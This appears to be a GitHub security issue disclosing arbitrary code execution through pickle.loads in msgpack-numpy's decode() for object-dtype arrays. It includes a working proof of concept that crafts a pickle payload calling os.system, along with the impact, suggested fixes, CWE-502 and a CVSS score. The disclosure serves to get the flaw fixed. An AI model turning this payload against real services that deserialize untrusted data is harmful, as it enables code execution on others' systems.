Skip to content

Security: Arbitrary Code Execution via pickle.loads in decode() when kind='O' #57

@gps949

Description

@gps949

Summary

The decode() function in msgpack_numpy/__init__.py (line 99) calls pickle.loads(obj[b'data']) without any safety checks when deserializing numpy arrays with dtype='O' (Object). This allows arbitrary code execution when loading untrusted msgpack data serialized with msgpack-numpy.

Vulnerable Code

# msgpack_numpy/__init__.py, line 83-99
def decode(obj, chain=None):
    try:
        if b'nd' in obj:
            if obj[b'nd'] is True:
                if b'kind' in obj and obj[b'kind'] == b'O':
                    return pickle.loads(obj[b'data'])  # <-- VULNERABLE

Proof of Concept

import msgpack
import msgpack_numpy
import pickle
import os

# Create malicious pickle payload
class Exploit:
    def __reduce__(self):
        return (os.system, ("echo RCE_CONFIRMED > /tmp/pwned.txt",))

# Craft malicious msgpack data
payload = {
    b'nd': True,
    b'kind': b'O',
    b'data': pickle.dumps(Exploit()),
    b'shape': (1,),
    b'type': b'O'
}

packed = msgpack.packb(payload)

# Trigger RCE
result = msgpack_numpy.unpackb(packed)
# /tmp/pwned.txt is now created

Impact

Any application that uses msgpack_numpy.unpackb(), msgpack_numpy.loads(), or msgpack.unpackb() with msgpack_numpy.decode as object_hook to deserialize untrusted data is vulnerable to arbitrary code execution.

Suggested Fix

  1. Remove pickle.loads entirely and raise an error for Object dtype arrays
  2. Or add a allow_pickle=False parameter (similar to numpy's approach) that defaults to False

CWE

CWE-502: Deserialization of Untrusted Data

CVSS

7.8 (High) - AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions